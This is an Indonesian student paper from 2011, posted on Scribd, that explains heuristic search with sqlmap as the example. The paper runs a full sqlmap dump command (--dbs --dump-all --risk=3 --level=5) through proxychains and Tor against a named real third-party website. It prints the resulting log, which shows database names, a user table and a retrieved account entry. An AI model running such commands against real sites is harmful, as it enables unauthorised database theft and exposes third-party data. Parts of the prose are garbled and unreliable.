P. 1
makalah, search Heuristic aplication sqlmap

makalah, search Heuristic aplication sqlmap

|Views: 255|Likes:
Published by abdullah al muzammi
keys : heuristic, artifical intenlenge, sqlmap.py, --dump, --risk=3 --level=1 , hack, tools, frameworks, security
keys : heuristic, artifical intenlenge, sqlmap.py, --dump, --risk=3 --level=1 , hack, tools, frameworks, security

More info:

Published by: abdullah al muzammi on Dec 28, 2011
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOCX, PDF, TXT or read online from Scribd
See more
See less

04/14/2015

pdf

text

original

TUGAS MAKALAH KECERDASAN BUATAN METODE PENCARAIAN HEURISTICS Tools security Frameworks Sqlmap

Oleh : Abdullah 055410172 DOSEN : Sari Iswati. Skom

SEKOLAH TINGGI ILMU MANAGEMAN INFORMATIKA DAN KOMPUTER AKAKOM
YOGYAKARTA 2011

Definisi Heuristic, Sqlmap dan Implentasi Heuristics pada dasarnya adalah teknik analisa yang digunakan untuk meningkatkan kinerja melalui proses komputasi. Di bidang ilmu komputer, heuristics adalah sebuah teknik yag dirancang untuk mampu menyelesaikan masalah, tanpa perlu pembuktian atas benar-tidaknya solusi yang diberikan, tetapi solusi yang dihasilkan biasanya merupakan solusi yang akurat, juga solusi atas masalah yang lebih sederhana tetapi berhubungan dengan permasalahan lain yang lebih kompleks. Dalam konteks sains komputer, Heuristic atau dikenal juga sebagai algoritma heuristic, adalah sebuah algoritma yang secara praktis mampu menghasilkan solusi atau penyelesaian atas sebuah masalah berkaitan dengan heuristik secara umum. Dalam konteks komputer sains, heuristic sekaligus

merupakan algoritma yang mampu bekerja cepat dan-atau mampu menyediakan hasil kerja yang baik. Dalam ilmu komputer khusunys dalam bidang kemanan algoritma ini digunakan dalam beberapa aplikasi, contohnya SQLMAP yang akan di terangkan pada contoh kasus dalam makalah ini. Penerapan Heuristik di bidang sains untuk konteks yang

kurang lebih sama yaitu bertujuan untuk meningkatkan kinerja (khususnya yang terkait dengan kecepatan secara menyeluruh). Fungsi heuristik disni ini

digunakan untuk mengevaluasi keadaan-keadaan problema individual dan menentukan seberapa jauh hal tersebut dapat digunakan untuk mendapatkan solusi yang diinginkan, solusi yang dimaksud disni ialah pencarian sebuah variable menggunakan agoritma heuristic. Dengan teknik SQLMAP penerapan pencarian heuristic yang digunakan ialah Search Genarate and Test (pembangkitan dan pengujian). yang dimaksud disni ialah menemukan sebuah titik khusus dalam ruang masalah untuk menemukan sebuah kemungkinan-kemungkinan dari masalah itu sendiri. Search Genarate and Test (Pembangkitan Dan Pengujian). Yang dimaksud Generete and Test ialah :

1. Menemukan sebuah titik khusus dalam ruang masalah untuk menemukan sebuah kemungkinan-kemungkinan dari masalah itu sendiri. 2. Melakukan pengujian untuk melihat apakah solusi yang dibuat benar–benar merupakan sebuah solusi, dengan cara membandingkan titik khusus tersebut dengan goal-nya (solusi 3. Jika telah diperoleh sebuah solusi, langkah– langkah tersebut dapat dihentikan. Jika belum, kembalilah ke langkah pertama. Di dalam kasus ini di ambil sebuah metode pencarian sebuah string komponen penting dalam data base, dengan memafaatkan celah cacat koding pada aplikasi untuk menemukan dan merunut link semua data dalam komputer server.
http://www.israel-diaspora.info/article.php?id=78

contoh link diatas merupakan celah kelemahan dari aplikasi yang pada saat link itu di jalankan akan menampilkan erorr sqml sever pada data base. Initnya melalui link ini bisa di temukan semua data base yang ada pada sever dengan mentode pancarian menggunakan sqlmap yang menggabungkan metode heuristic untuk mempercepat pencarian string variable yang di inginkan misalkan data admin dan user hingga client dalam server itu sendiri. Ruang Keadaan Indetifikasi Ruang Keadaan X : jumlah String kosong yang akan disi berupa admin dan password (A, P (x)) x disini bisa di sebut seorang penyerang. Y : ruang dimana string admin dan password berada ( A, P (y)).y disni juga bisa di sebut sebuah server data base. Keadaan Awal Dan Akhir X dalam keadaan kosong, dengan metode pencarian yang digunakan untuk memindakan kedua string (A,P (y)) untuk berada dalam A,P (x) . Dimana di asusmsikan Admin (1) , Password (2). Posisi awal (x) dan posisi akhir (y).
0, 0 (x) sqlmap 1, 2 (y)

1, 2 (x)

sqlmap

1, 2 (y)

sqlmap.py --url "http://www.israel-diaspora.info/article.php?id=78" --dbs --dump-all --risk=3 --level=5 threads=5

Di jelaskan disni ruang keadaan awal (x) atau si penyerang dalam keadaan 0,0 dan ruang keadaan y (1,2) yang berisikan nilai admin dan password. Pada saat dijalankan perintah execute dump data pada y akan di dapat diperoleh nilai 1,2 (A,P) dari y untuk berada dalam x. Implentasi menggunakan Sqlmap

sqlmap adalah penetrasi open source alat pengujian yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database. Muncul dengan mesin deteksi yang kuat, fitur banyak ceruk tester penetrasi tertinggi dan berbagai switch yang berlangsung dari sidik jari database, mengambil data dari database, untuk mengakses sistem file yang mendasari dan mengeksekusi perintah pada sistem operasi melalui out-of-band koneksi.

root@bt:/pentest/database/sqlmap# proxychains python sqlmap.py --url "http://www.israeldiaspora.info/article.php?id=78" --dbs --dump-all --risk=3 --level=5 threads=5 ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:9050-<><>-175.111.91.47:80-<><>-OK [12:58:34] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable [12:58:34] [INFO] testing sql injection on GET parameter 'id' [12:58:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:36:44] [INFO] sqlmap will dump entries of all databases' tables now [10:36:44] [INFO] fetching tables for databases: lelien_isradiasp, information_schema |S-chain|-<>-127.0.0.1:9050-<><>-216.246.55.247:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-216.246.55.247:80-<><>-OK [10:39:50] [INFO] retrieved: "1","redacteur","pascale+","1" Database: lelien_isradiasp Table: userkeys

[1 entry]

Kesimpulan Pada makalah ini membahas mengenai sedikit membahas teknik penyerangan yakni pengambilan sebuah data pada sebuah server dengan menggunakan metode Sqlmap. Dimana sqlmap sendiri menggunakan algoritma heuristic untuk mempercepat pencarian varibale yang dimaksud yakni Id admin dan passwordnya. Seperti sintak dibawah ini :

[12:58:34] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable

Menjelaskan sebuah kesalahan pada link yang dimaksud (http://www.israeldiaspora.info/article.php?id=78) akan di lakukan ijectable pada data base dengan menggunakan test Heuristic. Maka dapat disimpulkan dalam metode pencarian menggunakan sqlmap ini menggunkan algoritma heuristic untuk mempermudah dan mempercepat pencarian string pada server si target.

Daftar pusata :
http://www.scribd.com/doc/41982538/Peran-Kecerdasan-Buatan-Dan-Alami-Dalam-Teknologi author : abdullah al muzammi, 2010 www.heuristics.org.uk http://blog.eset.co.id/index.php/heuristic-apa-dan-bagaimana-bagian-1/ http://en.wikipedia.org/wiki/SQL_injection

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->